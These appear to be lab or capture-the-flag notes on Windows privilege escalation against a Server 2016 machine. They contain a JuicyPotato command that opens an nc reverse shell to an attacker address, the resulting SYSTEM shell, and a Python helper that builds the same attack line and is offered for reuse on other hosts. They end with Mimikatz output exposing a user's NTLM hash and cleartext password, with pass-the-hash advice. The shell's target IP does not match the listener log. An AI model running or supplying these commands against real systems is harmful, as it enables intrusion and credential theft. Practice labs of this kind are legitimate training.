3 privesc
whoami /priv
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
OS Name: Microsoft Windows Server 2016 Standard
Using JuicyPotato
https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
# needs SeImpersonatePrivilege (or SeAssignPrimaryTokenPrivilege); whoami /priv above shows SeImpersonatePrivilege Enabled
# works on this build (10.0.14393, Server 2016); the DCOM trick is dead from Windows 10 1809 / Server 2019 (build 17763) on,
# use PrintSpoofer or RoguePotato there. If the default CLSID fails, pick another from the project's CLSID list with -c {CLSID}
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c PATH\nc.exe -e cmd.exe 10.2.74.151 9999" -t *
$ rlwrap nc -lvnp 9999
listening on [any] 9999 ...
connect to [10.10.14.34] from (UNKNOWN) [10.10.10.29] 53225
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
whoami
whoami
nt authority\system
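The steps above (read whoami /priv, check the OS build, fire JuicyPotato) as a small triage helper. This is an added example, not code from the notes or from the JuicyPotato project: the build threshold encodes the widely documented fact that JuicyPotato's DCOM activation trick stops working at Windows 10 1809 / Server 2019 (build 17763), where PrintSpoofer or RoguePotato are the usual replacements. All function and constant names are this example's own, and the sample input is constructed from the output shown above.

```python
"""Potato-family triage: which token-impersonation technique applies here?

Added example, not part of the original notes or of JuicyPotato.
"""
import re

# Either privilege is enough for the Potato trick. It only needs to be held:
# a privilege listed as Disabled can be enabled by the process itself with
# AdjustTokenPrivileges, so the State column does not matter.
IMPERSONATION_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

# Assumption: last build on which JuicyPotato works (17763 = 1809 / Server 2019).
JUICY_MAX_BUILD = 17762

# Constructed sample: the `whoami /priv` table and shell banner from the notes.
SAMPLE_PRIVS = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""
SAMPLE_BANNER = "Microsoft Windows [Version 10.0.14393]"


def parse_privs(whoami_priv: str) -> dict:
    """Parse `whoami /priv` output into {privilege name: 'Enabled'|'Disabled'}."""
    privs = {}
    for line in whoami_priv.splitlines():
        # name, free-text description, then the state in the last column
        m = re.match(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$", line)
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def build_number(version_banner: str) -> int:
    """Extract the build from e.g. 'Microsoft Windows [Version 10.0.14393]'."""
    m = re.search(r"\b\d+\.\d+\.(\d+)", version_banner)
    if not m:
        raise ValueError("no build number in banner")
    return int(m.group(1))


def triage(whoami_priv: str, version_banner: str) -> str:
    """Return 'juicypotato', 'printspoofer-or-roguepotato' or 'none'."""
    held = set(parse_privs(whoami_priv)) & IMPERSONATION_PRIVS
    if not held:
        return "none"  # no impersonation privilege: Potato attacks do not apply
    if build_number(version_banner) <= JUICY_MAX_BUILD:
        return "juicypotato"
    return "printspoofer-or-roguepotato"


def juicy_cmd(nc_path: str, lhost: str, lport: int, com_port: int = 1337, clsid: str = "") -> str:
    """Assemble the JuicyPotato line used in the notes.

    -l COM server listen port, -p program to run, -a its arguments,
    -t * try both CreateProcessWithTokenW and CreateProcessAsUser,
    -c an explicit CLSID when the default one does not work on the host.
    """
    args = f"/c {nc_path} -e cmd.exe {lhost} {lport}"
    cmd = f'JuicyPotato.exe -l {com_port} -p c:\\windows\\system32\\cmd.exe -a "{args}" -t *'
    if clsid:
        cmd += f" -c {clsid}"
    return cmd


if __name__ == "__main__":
    print(triage(SAMPLE_PRIVS, SAMPLE_BANNER))
    print(juicy_cmd("c:\\temp\\nc.exe", "10.10.14.34", 9999))
```

Paste the target's whoami /priv output and `ver` banner into the two sample strings to reuse it on another host; the decision is only about the DCOM trick, so on a newer build the output is a pointer to the alternative tools, not a command line for them.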
# loaded Mimikatz in the SYSTEM shell and ran sekurlsa::logonpasswords; the record for sandra:
Authentication Id : 0 ; 294058 (00000000:00047caa)
Session           : Interactive from 1
User Name         : sandra
Domain            : MEGACORP
Logon Server      : PATHFINDER
Logon Time        : 4/24/2021 8:42:29 PM
SID               : S-1-5-21-1035856440-4137329016-3276773158-1105
        msv :
         [00000003] Primary
         * Username   : sandra
         * Domain     : MEGACORP
         * NTLM       : 29ab86c5c4d2aab957763e5c1720486d
         * SHA1       : 8bd0ccc2a23892a74dfbbbb57f0faa9721562a38
         * DPAPI      : f4c73b3f07c4f309ebf086644254bcbc
        tspkg :
        wdigest :
         * Username   : sandra
         * Domain     : MEGACORP
         * Password   : (null)
        kerberos :
         * Username   : sandra
         * Domain     : MEGACORP.LOCAL
         * Password   : Password1234!
# wdigest is (null) because Server 2016 does not cache WDigest cleartext by default; the kerberos provider
# still holds the cleartext for this interactive logon, and the msv NTLM hash is usable for pass-the-hash either way